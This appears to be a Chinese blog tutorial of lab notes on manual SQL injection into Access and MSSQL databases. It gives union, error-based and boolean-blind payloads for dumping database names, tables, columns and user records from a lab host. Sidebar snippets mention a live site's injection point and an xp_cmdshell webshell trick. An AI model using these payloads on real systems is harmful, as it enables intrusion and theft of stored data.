1-9其他数据库注入

最新推荐文章于 2022-08-12 10:04:09 发布
最新推荐文章于 2022-08-12 10:04:09 发布
阅读量135 收藏
点赞数
分类专栏: web安全
原文链接:https://blog.csdn.net/weixin_45923850/article/details/108129913
版权

文章目录

数据库注入

access数据库

判断access数据库
  • 根据url的后缀。ASP为后缀名的是ACCESS数据库
  • 在url后面加单引号,以报错信息“Microsoft ole db provider for odbc drivers”判断为access
  • 通过and (select count(*) from msysobjects)>0发牛错误页面则为access数据库。msysobjects、msysqueries\msysrelationships为access的三个系统表,web环境下没有权限访问
常用函数
  • count():返回统计给定条件的行数
  • len():字符串长度,例len(‘database’)返回’8‘
  • asc():返回ascii值
  • mid(‘字符串’,n,m):返回从第n位开始,截取m长度的字符串
  • chr():返回ascii对应的字符
  • IIF(条件表达式,true,false):判断条件成立返回true,否则返回false
  • exists():判断是否存在数据,返回true或false
查询语句构造
联合查询

先判断数据库类型

  1. 判断整型注入还是字符型,例?id=5-1和?id=4相同,则整型
  2. 判断列数:?id=1 order by N
  3. 枚举获取关键表名:?id=1 and exists(select count(*) from admin),看admin表是否存在,如果返回值则存在,反之
  4. 获取回显位置:?id=1 union select 1,1,1 from admin
  5. 获取数据(不存在limit和concat):?id=1 union select 1,user(),1 from admin where id=2,如果报错,则没有猜解函数的字段

在这里插入图片描述

布尔型盲注
  1. 猜解表名:?id=5 and (select count(*) from admin)>0或?id=5 and exists(select count(**) from admin),页面出错则不存在
  2. 表的行数:?id=5 and (select count(*) from admin)>N
  3. 猜解字段名:?id=5 and (select uname from admin)
  4. 猜解字段内容的长度:?id=5 and (select top 1 len( username) from admin)>N
  5. 获取内容值:用mid函数将内容截取长度,再进行asc函数得到ascii码值,就得到对应的字符了。输入?id=5 and (select top 1 asc(mid( username,M,1)) from admin)>N,M从1看是截取1的长度,用二分法不停尝试N的值,知道找到正确N值,M再加一,最后加至5获取该字段内容为admin。

mssql数据库

mssql数据库判断
  • .aspx为后缀的
  • 通过?id=5 and (select count(*) from sysobjects)>0,页面正常,则为mssql数据库。因为存在三个系统表,
    • sysobjects:存放所有对象。字段有name-对象名、id-对象id、xtype-对象类型、uid、status)
    • syscolumns:存放所有字段。字段有name-表名,id-表id,colid-字段id。当xtype=u and status>0时,对象名=表名,对象id=表id
    • sysdatabases:保存在master数据库中,保存了所有库名,库id和其他信息
环境—靶机-2k3_sp2

在这里插入图片描述

  1. 开启服务

  2. 登录数据库
    在这里插入图片描述

  3. http://192.168.43.21:8006/dianpu.aspx?id=1实践

常用函数
  • host_name():返回服务器的名称
  • Currnet_user:返回当前数据库用户
  • db_name():返回当前数据库名称
  • CHAR():将ascii转换为字符
  • Object_id():返回数据库表名,通常用16进制或sql编码
  • col_name(table_id,column_id):返回指定表中的列
  • isnull():使用指定的替换值替换null
  • substring():返回子字符串,也就是截取
查询语句构造
联合查询

  1. 判断数据库类型:输入/dianpu.aspx?id=1 and (select count(*) from sysobjects)>0页面正常,为mssql数据库

  2. **判断列数:**输入?id=1 order by 14,页面报错,则为13列,并且回显位是字符串时,会在页面显示,这里第10列为字符串

  3. **判断回显位置:**字符串的位置用null代替,输入?id=1 union select

    1,2,3,4,5,6,7,8,9,null,11,12,13页面报错,意思union执行了默认的去重功能,那这里不需要,所以重新输入为?id=1 union all select 1,2,3,4,5,6,7,8,9,null,11,12,13,

在这里插入图片描述

但是页面依然报错,如下,所以哈是有的位置依然不是数字型,只能一个一个将位置置空,换null,来确定哪些是字符型位置,最终确定为?id=-1 union all select 1,2,null,null,55,null,null,8,9,null,null,12,13,页面正常

在这里插入图片描述

  1. **获取数据库名:**输入?id=-1 union all select 1,2,name,null,55,null,null,8,9,null,null,12,13 from master…sysdatabases,页面显示所有数据库名

  2. 获取当前数据库名:输入?id=-1 union all select 1,2,null,null,55,db_name(),null,8,9,null,null,12,13 from master…sy,页面显示当前数据库为jiaofan

  3. **获取数据库表名:**输入?id=-1 union all select 1,2,name,null,55,null,null,8,9,null,null,12,13 from jiaofan…sysobjects where xtype=0x5500,即jiaofan数据库下的表

  4. **获取列名:**输入?id=-1 union all select 1,2,name,null,55,null,null,8,9,null,null,12,13 from jiaofan…syscolumns where id=(select id from jiaofan…sysobjects where name=0x73006C005F007500730065007200),页面显示表中的列名信息

  5. **获取列字段的内容:**输入?id=-1 union all select 1,2,zuocheng,null,55,null,null,8,9,null,null,12,13 from sl_user,即获取sl_user表中zuocheng字段的信息

在这里插入图片描述

报错注入

  1. **获取数据库名:**输入http://192.168.43.21:8006/list.aspx?quyu=??′¨′ó?§?-°2oóD£??&kouwei=3?à±’ and 1=(select top 1 name from master…sysdatabases where name not in (select top N name from master…sysdatabases)) --+,该语句意思N值从0增加,逐个获取数据库名,查询第一数据库名,查第二个时,需要去更改N值 从报错信息知数据库为master

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-I5GhwXk2-1597919684695)(D:\Desktop\乱七八糟\渗透\笔记\图库\1595341928185.png)]

  2. **获取当前数据库名:**输入’ and 1=(select db_name()) --+,获取的为jiaofan

  3. **获取库里面的表:**输入’ and 1=(select top 1 name from jiaofan…sysobjects where xtype=‘U’ and name not in (select top N name from jiaofan…sysobjects where xtype=‘U’)) --+,显示的表为sl_banner,将N值从0增加,逐个获取表名

  4. **获取列名信息:**输入’ and 1=(select top 1 name from jiaofan…syscolumns where id=(select id from jiaofan…sysobjects where name=‘sl_user’) and name not in (select top N name from jiaofan…syscolumns where id=(select id from jiaofan…sysobjects where name=‘sl_user’))) --+,同理,逐个获取列名,这里是shouji

  5. 获取列中的信息:输入’ and 1=(select top 1 shouji from sl_user where shouji not in (select top N shouji from sl_user)) --+,获取到了相应的信息

布尔型盲注

在这里插入图片描述

zxl2605
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册1
mssql有趣的注入
一个码农的笔记
11-03 1442
这个注入点:http://www.mydcis.net/temp.asp?ID=1 这个网站有sql注入,但是他会拦截空格,单引号,分号,而且括号后面不能有字母,如果有的话,他会拦截,并且提示: 本操作将可能危害数据安全, 请确认你提交的信息。 有任何问题请联系系统管理员。 首先用order by 探测字段数,发现有45个字段,这个手工不太适合,但是这个网站可以显错,所以,我们用报
文件包含漏洞
qq_50854662的博客
05-21 6614
【文件包含】文件包含漏洞知识总结 一、什么是文件包含漏洞? 1、文件包含概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做包含。 有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任.
AWVS14.7sql注入部分源码分析
Ciyaso的博客
04-16 1643
AWVS-SQL注入部分源码分析 **PS:**在文章中我会对一些句式进行缩进,文字默认定格,输入缩进对应着代码缩进,所以请注意我的段落缩进。 classErrorBasedSQLInjection.inc classSQLErrorMessages() this.plainArray 存储常见的sql注入报错信息,如 'Microsoft OLE DB Provider for ODBC Drivers', 'Error Executing Database Query', 'Microsoft OLE
史上最全的 SQL 注入资料
笑释一切的博客
09-28 9273
什么是 SQL 注入速查表?SQL注入速查表是可以为你提供关于不同种类 SQL注入漏洞 的详细信息的一个资源。这份速查表对于经验丰富的渗透测试人员,或者刚开始接触 Web应用安全 的初学者,都是一份很好的参考资料。关于这份 SQL 注入速查表这份 SQL 速查表最初是 2007 年时 Ferruh Mavituna 在他自己的博客上发布的。我们更新了它并将它移到了公司 CEO 的博客上。现在,这份速
SQL注入实例
红流
10-21 817
搜索自己的姓名,居然能找到在学生时代发布的求职页,注册密码忘了,想删除它,联系管理员没音讯。测试一下sql注入Microsoft OLE DB Provider for SQL Server 错误 80040e14 字符串  之前有未闭合的引号。  天助我也!猜测SQL并注入语句,whereuserid=zzf and(= and password=
SQL注入之Mssql注入
qq_57307348的博客
02-16 5416
sql注入之mssql注入基础
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 4968
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
SQL Server应用程序中的高级SQL注入
weixin_34360651的博客
07-21 154
 创建时间:2004-06-10文章属性:翻译文章提交:panderlang (pander_lang_at_hotmail.com)SQL Server应用程序中的高级SQL注入作者:Chris Anley[[email protected]]An NGSSoftware Insight Security Research(NISR) Publication翻译:青野志狼(panderl...
整理的一些有用的ASP注入相关的命令 BY pt007&solaris7
l0ng专栏
01-11 2851
整理的一些有用的ASP注入相关的命令 BY pt007&solaris7大家好 ,我们是pt007和solaris7,QQ:7491805/564935,欢迎高手前来交流:)。1、 用^转义字符来写ASP(一句话木马)文件的方法: http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execut
MySQL数据库-SQL注入手册1
08-08
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’
Postgres数据库SQL注入手册1
08-08
Postgres数据库SQL注入手册1
Oracle数据库SQL注入手册1
08-08
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’
E108-数据库安全-手工注入mysql数据库.pdf
12-02
E108-数据库安全-手工注入mysql数据库
数据库注入提权总结(三)
蚁景网安学院
08-12 4753
差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
PB10中Microsoft OLE DB数据库连接配置
ldy的专栏
03-21 3384
PB10中OLE Microsoft OLE DB数据库连接配置 PB10的测试版本已经推出来有段时间。可是我直到现在我才开始试用:$ 。PB10 Beta 1可以到下面两个地址下载: 1、陶清:http://www.pdriver.com/display.asp?key_id=15632、Sybase:http://www.sybase.com/detail?id=102
SQL注入的测试
weixin_39901032的博客
11-06 2355
一.SQL注入的简单理解 SQL注入是通过web客户端,通过用户输入数据输入,插入或‘注入’部分或完整的SQL语句。一次成功的SQL注入攻击可以读取数据库中的敏感数据、修改数据库(插入、删除、更新),在数据库上执行管理操作等。本质上,SQL注入是一种注入攻击,其SQL命令被注入到数据平台中,以影响预期的SQL命令执行。 一般来说,编写web应用的程序员会把SQL语句与用户输入数据结合在一起: eg...
记一次mssql手工注入
Matthew
04-04 9273
记一次mssql手工注入 记录一次mssql注入的过程,很多都是久的知识,大家当温故而知新吧。 xxxx/xxx?nIDX=122‘ 注入报错,直接sqlmap跑,但有waf拦截; 只能进行fuzz了,发现select 和 from之间用/**/就可以绕过。 (1)首先查看版本号: 由于是数字型的报错,不用闭合单引号。直接@@version先查看版本号: Microsoft OLE ...
SQL注入(二)
beidou321的专栏
12-24 112
mybatis-plus 达梦数据库
最新发布
08-25
你好!对于使用 MyBatis-Plus 操作达梦数据库,你需要按照以下步骤进行配置和使用: 1. 添加 MyBatis-Plus 和达梦数据库的依赖: 在你的项目的 pom.xml 文件中添加以下依赖: ```xml <dependencies> <!-- MyBatis-Plus --> <dependency> <groupId>com.baomidou</groupId> <artifactId>mybatis-plus-boot-starter</artifactId> <version>最新版本</version> </dependency> <!-- 达梦数据库 --> <dependency> <groupId>com.dameng</groupId> <artifactId>Dm7JdbcDriver17</artifactId> <version>最新版本</version> </dependency> </dependencies> ``` 请确保替换 "最新版本" 为正确的版本号。 2. 配置数据源: 在你的项目的配置文件(如 application.properties 或 application.yml)中添加以下达梦数据库的配置: ```yaml spring.datasource.url=jdbc:dm://localhost:5236/your_database spring.datasource.driver-class-name=dm.jdbc.driver.DmDriver spring.datasource.username=your_username spring.datasource.password=your_password ``` 请将 "your_database" 替换为你自己的数据库名称,同时替换 "your_username" 和 "your_password" 为正确的用户名和密码。 3. 创建 MyBatis-Plus 的 Mapper 接口和实体类: 创建一个继承自 `BaseMapper` 的 Mapper 接口,并创建对应的实体类。例如: ```java // Mapper 接口 public interface UserMapper extends BaseMapper<User> { } // 实体类 @TableName("user") public class User { @TableId private Long id; private String username; private String password; // 省略 getter 和 setter } ``` 4. 使用 MyBatis-Plus 进行数据库操作: 在需要进行数据库操作的地方,注入对应的 Mapper 接口,并使用 MyBatis-Plus 提供的方法进行增删改查操作。例如: ```java @Service public class UserService { @Autowired private UserMapper userMapper; public void addUser(User user) { userMapper.insert(user); } public User getUserById(Long id) { return userMapper.selectById(id); } // 其他操作方法... } ``` 这样,你就可以使用 MyBatis-Plus 对达梦数据库进行操作了。 希望以上信息能对你有所帮助!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值